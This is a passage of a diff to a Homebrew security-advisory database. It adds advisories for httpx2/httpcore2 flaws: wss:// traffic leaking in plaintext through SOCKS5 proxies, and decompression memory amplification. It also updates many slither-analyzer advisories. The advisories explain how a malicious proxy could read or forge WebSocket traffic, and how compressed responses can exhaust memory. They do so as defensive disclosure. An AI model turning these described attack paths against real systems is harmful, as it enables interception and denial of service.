"https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-rapid-mlx-CVE-2026-84381.json b/advisories/BREW-rapid-mlx-CVE-2026-84381.json new file mode 100644 index 0000000000..27c2abc82a --- /dev/null +++ b/advisories/BREW-rapid-mlx-CVE-2026-84381.json @@ -0,0 +1,98 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-rapid-mlx-CVE-2026-84381", + "published": "2026-09-10T20:37:32Z", + "modified": "2026-09-10T20:37:32Z", + "upstream": [ + "GHSA-7mj9-2mp8-4m2p", + "CVE-2026-84381", + "PYSEC-2026-3844", + "PYSEC-2026-3845" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "rapid-mlx", + "purl": "pkg:brew/rapid-mlx" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.11.3" + }, + { + "fixed": "0.12.8" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpcore2", + "resource_purl": "pkg:pypi/httpcore2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpcore2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpcore2@2.12.0", + "resource": "httpcore2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Secure WebSocket traffic sent without TLS through SOCKS proxies", + "details": "### Summary\n\nhttpcore2 does not start TLS for `wss://` connections routed through a SOCKS5 proxy. The WebSocket opening handshake and all subsequent frames are sent in plaintext through the proxy path, despite the caller selecting the secure `wss` scheme.\n\nThe transport flaw affects httpcore2 releases before `2.10.0`. HTTPX2 exposed this behavior through its public `Client.websocket()` and `AsyncClient.websocket()` APIs from `2.6.0` through `2.9.1`.\n\n### Details\n\nThe synchronous and asynchronous SOCKS5 connection implementations upgrade the established proxy tunnel to TLS only when the remote origin scheme is `https`. The equivalent check does not include `wss`. After the SOCKS5 handshake succeeds, the raw stream is therefore passed directly to the HTTP/1.1 connection, which writes the WebSocket upgrade request without first performing a TLS handshake or verifying the destination certificate.\n\nFor example, an application using HTTPX2 `2.6.0` through `2.9.1` may open an authenticated WebSocket through a SOCKS proxy:\n\n```python\nimport httpx2\n\nwith httpx2.Client(proxy=\"socks5://proxy.example:1080\") as client:\n with client.websocket(\n \"wss://service.example/private?token=query-secret\",\n headers={\"Authorization\": \"Bearer header-secret\"},\n cookies={\"session\": \"cookie-secret\"},\n ) as websocket:\n websocket.send_text(\"private message\")\n```\n\nOn affected versions, the stream passing through the SOCKS proxy begins with a plaintext request such as:\n\n```text\nGET /private?token=query-secret HTTP/1.1\nHost: service.example\nAuthorization: Bearer header-secret\nCookie: session=cookie-secret\n```\n\nBefore HTTPX2 `2.6.0`, the same underlying httpcore2 behavior could be reached by integrations constructing a WebSocket upgrade request through the low-level transport API, but HTTPX2 did not yet provide its native WebSocket client API.\n\nA normal secure WebSocket server will usually reject these plaintext bytes because it expects a TLS ClientHello. However, a malicious or compromised SOCKS proxy can accept the SOCKS connection, observe the plaintext handshake, return a forged `101 Switching Protocols` response, and then read or modify WebSocket frames in both directions. An observer between the proxy and destination may also read the plaintext traffic.\n\nRFC 6455 requires a client using a secure WebSocket connection to perform the TLS handshake before sending the WebSocket opening handshake. A `wss` URI promises confidentiality, integrity, and endpoint authentication through TLS.\n\n### Impact\n\nAn attacker able to control or observe the SOCKS proxy path can obtain URL query parameters, authorization headers, cookies, and application messages that the caller expected TLS to protect. Because no TLS handshake occurs, certificate verification also does not occur, allowing an attacker controlling the proxy to impersonate the WebSocket server and inject or alter messages.\n\nOnly `wss://` connections routed through a SOCKS5 proxy are affected. Direct `wss://` connections and ordinary `https://` requests through SOCKS already start TLS correctly.\n\n### Mitigation\n\nUpgrade HTTPX2 and httpcore2 to `2.10.0` or later. Patched versions start TLS for both `https` and `wss` origins in the synchronous and asynchronous SOCKS5 connection paths.\n\nIf upgrading is not immediately possible, do not route `wss://` connections through a SOCKS proxy. Use a direct secure WebSocket connection or another transport that performs and verifies TLS to the WebSocket origin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-7mj9-2mp8-4m2p" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84381" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1104" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/fb008dd700b761d955210d9692475c3e2f379453" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-rapid-mlx-CVE-2026-84382.json b/advisories/BREW-rapid-mlx-CVE-2026-84382.json new file mode 100644 index 0000000000..9f24962e2d --- /dev/null +++ b/advisories/BREW-rapid-mlx-CVE-2026-84382.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-rapid-mlx-CVE-2026-84382", + "published": "2026-09-10T20:37:33Z", + "modified": "2026-09-10T20:37:33Z", + "upstream": [ + "GHSA-8xx6-hgc6-gc2m", + "CVE-2026-84382", + "PYSEC-2026-3846" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "rapid-mlx", + "purl": "pkg:brew/rapid-mlx" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.11.3" + }, + { + "fixed": "0.12.16" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.12.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Streaming response decompression does not bound peak memory (decompression amplification)", + "details": "### Summary\n\nWhen decoding a compressed response body (`gzip`, `deflate`, `br`, or `zstd`), HTTPX2 fully decompressed each network read before yielding content to the application. A small compressed input could therefore cause a large intermediate memory allocation, even when the application streamed the response to keep memory usage bounded.\n\n### Details\n\nHTTPX2's default transport reads the socket in pieces of up to 64 KiB. Before `2.12.0`, each piece was inflated completely into one intermediate allocation before any decompressed bytes were yielded.\n\nAt DEFLATE's maximum compression ratio of roughly 1032:1, a 64 KiB compressed chunk can expand to about 64 MiB in one allocation. Brotli and Zstandard responses can cause similarly large amplification. Streaming the response did not prevent these transient allocations.\n\n### Impact\n\nApplications that fetch resources from untrusted or attacker-influenced servers - such as webhook receivers, link unfurlers, crawlers, SSRF-reachable fetchers, and redirect followers - can experience memory pressure or out-of-memory termination when processing a malicious compressed response. No authentication or user interaction is required beyond issuing a request to the server.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.12.0` or later. Patched versions decompress responses incrementally with bounded intermediate buffers, including responses with multiple content encodings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-8xx6-hgc6-gc2m" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84382" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1126" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/4fd0c70a3f207c618b145934792f791bccfb39f8" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.12.0" + } + ] +} diff --git a/advisories/BREW-slither-analyzer-CVE-2014-1829.json b/advisories/BREW-slither-analyzer-CVE-2014-1829.json index 5e2a164b12..cffb9aa74e 100644 --- a/advisories/BREW-slither-analyzer-CVE-2014-1829.json +++ b/advisories/BREW-slither-analyzer-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2014-1829", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2014-1830.json b/advisories/BREW-slither-analyzer-CVE-2014-1830.json index 0a13278ef4..8daafd1427 100644 --- a/advisories/BREW-slither-analyzer-CVE-2014-1830.json +++ b/advisories/BREW-slither-analyzer-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2014-1830", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2015-2296.json b/advisories/BREW-slither-analyzer-CVE-2015-2296.json index 12f9eda7da..c9481018af 100644 --- a/advisories/BREW-slither-analyzer-CVE-2015-2296.json +++ b/advisories/BREW-slither-analyzer-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2015-2296", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2016-9015.json b/advisories/BREW-slither-analyzer-CVE-2016-9015.json index d87a3901ce..440b23bf98 100644 --- a/advisories/BREW-slither-analyzer-CVE-2016-9015.json +++ b/advisories/BREW-slither-analyzer-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2016-9015", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2018-1000518.json b/advisories/BREW-slither-analyzer-CVE-2018-1000518.json index 9b61f52864..2e23607ba6 100644 --- a/advisories/BREW-slither-analyzer-CVE-2018-1000518.json +++ b/advisories/BREW-slither-analyzer-CVE-2018-1000518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2018-1000518", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-6g87-ff9q-v847", "CVE-2018-1000518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "15.0.1", - "key": "pkg:pypi/websockets@15.0.1", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2018-15560.json b/advisories/BREW-slither-analyzer-CVE-2018-15560.json index 8fc0f002bd..07ec27d3a4 100644 --- a/advisories/BREW-slither-analyzer-CVE-2018-15560.json +++ b/advisories/BREW-slither-analyzer-CVE-2018-15560.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2018-15560", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-hgg3-g7gr-66r7", "CVE-2018-15560", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pycryptodome", - "subject_version": "3.23.0", - "key": "pkg:pypi/pycryptodome@3.23.0", - "resource": "pycryptodome" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2018-18074.json b/advisories/BREW-slither-analyzer-CVE-2018-18074.json index 1b5fd85f98..19551558db 100644 --- a/advisories/BREW-slither-analyzer-CVE-2018-18074.json +++ b/advisories/BREW-slither-analyzer-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2018-18074", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2018-20060.json b/advisories/BREW-slither-analyzer-CVE-2018-20060.json index 5a733fdb36..583b0ee257 100644 --- a/advisories/BREW-slither-analyzer-CVE-2018-20060.json +++ b/advisories/BREW-slither-analyzer-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2018-20060", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2018-25091.json b/advisories/BREW-slither-analyzer-CVE-2018-25091.json index 36f867b7b2..57d1ece545 100644 --- a/advisories/BREW-slither-analyzer-CVE-2018-25091.json +++ b/advisories/BREW-slither-analyzer-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2018-25091", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2019-11236.json b/advisories/BREW-slither-analyzer-CVE-2019-11236.json index 1ae8c55785..366d559d66 100644 --- a/advisories/BREW-slither-analyzer-CVE-2019-11236.json +++ b/advisories/BREW-slither-analyzer-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2019-11236", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2019-11324.json b/advisories/BREW-slither-analyzer-CVE-2019-11324.json index e4dfb5e503..7c02c45ab4 100644 --- a/advisories/BREW-slither-analyzer-CVE-2019-11324.json +++ b/advisories/BREW-slither-analyzer-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2019-11324", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2020-26137.json b/advisories/BREW-slither-analyzer-CVE-2020-26137.json index ca36e85767..aba86f7067 100644 --- a/advisories/BREW-slither-analyzer-CVE-2020-26137.json +++ b/advisories/BREW-slither-analyzer-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2020-26137", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2020-7212.json b/advisories/BREW-slither-analyzer-CVE-2020-7212.json index 4d4f9e31a3..52025a5f03 100644 --- a/advisories/BREW-slither-analyzer-CVE-2020-7212.json +++ b/advisories/BREW-slither-analyzer-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2020-7212", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2021-21330.json b/advisories/BREW-slither-analyzer-CVE-2021-21330.json index 28a5f629d8..18f352ad51 100644 --- a/advisories/BREW-slither-analyzer-CVE-2021-21330.json +++ b/advisories/BREW-slither-analyzer-CVE-2021-21330.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2021-21330", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-v6wp-4m6f-gcjg", "CVE-2021-21330", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2021-28363.json b/advisories/BREW-slither-analyzer-CVE-2021-28363.json index 55fb5acf98..faf1ce2bde 100644 --- a/advisories/BREW-slither-analyzer-CVE-2021-28363.json +++ b/advisories/BREW-slither-analyzer-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2021-28363", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2021-33503.json b/advisories/BREW-slither-analyzer-CVE-2021-33503.json index 895bcf73f0..9799951d54 100644 --- a/advisories/BREW-slither-analyzer-CVE-2021-33503.json +++ b/advisories/BREW-slither-analyzer-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2021-33503", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2021-33880.json b/advisories/BREW-slither-analyzer-CVE-2021-33880.json index d0bb11fcab..6b3ca99ace 100644 --- a/advisories/BREW-slither-analyzer-CVE-2021-33880.json +++ b/advisories/BREW-slither-analyzer-CVE-2021-33880.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2021-33880", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-8ch4-58qp-g3mp", "CVE-2021-33880", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "15.0.1", - "key": "pkg:pypi/websockets@15.0.1", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2022-1930.json b/advisories/BREW-slither-analyzer-CVE-2022-1930.json index 8226b2e203..7531511961 100644 --- a/advisories/BREW-slither-analyzer-CVE-2022-1930.json +++ b/advisories/BREW-slither-analyzer-CVE-2022-1930.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2022-1930", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-v65g-f3cj-fjp4", "CVE-2022-1930", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "eth-account", - "subject_version": "0.13.7", - "key": "pkg:pypi/eth-account@0.13.7", - "resource": "eth-account" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-32681.json b/advisories/BREW-slither-analyzer-CVE-2023-32681.json index 9ad349ece2..c96fe9c7d9 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-32681.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-32681", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-37276.json b/advisories/BREW-slither-analyzer-CVE-2023-37276.json index 5ca49b6933..4103233cb6 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-37276.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-37276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-37276", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-45c4-8wx5-qw6w", "CVE-2023-37276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-43804.json b/advisories/BREW-slither-analyzer-CVE-2023-43804.json index 153335973f..56146ce30b 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-43804.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-43804", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-45803.json b/advisories/BREW-slither-analyzer-CVE-2023-45803.json index 16fb301909..006bcf64b8 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-45803.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-45803", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-47627.json b/advisories/BREW-slither-analyzer-CVE-2023-47627.json index 352ea4aa28..705509b2d6 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-47627.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-47627.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-47627", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-gfw2-4jvh-wgfg", "CVE-2023-47627", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-47641.json b/advisories/BREW-slither-analyzer-CVE-2023-47641.json index e18798c593..4c0e5cda86 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-47641.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-47641.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-47641", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-xx9p-xxvh-7g8j", "CVE-2023-47641", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - 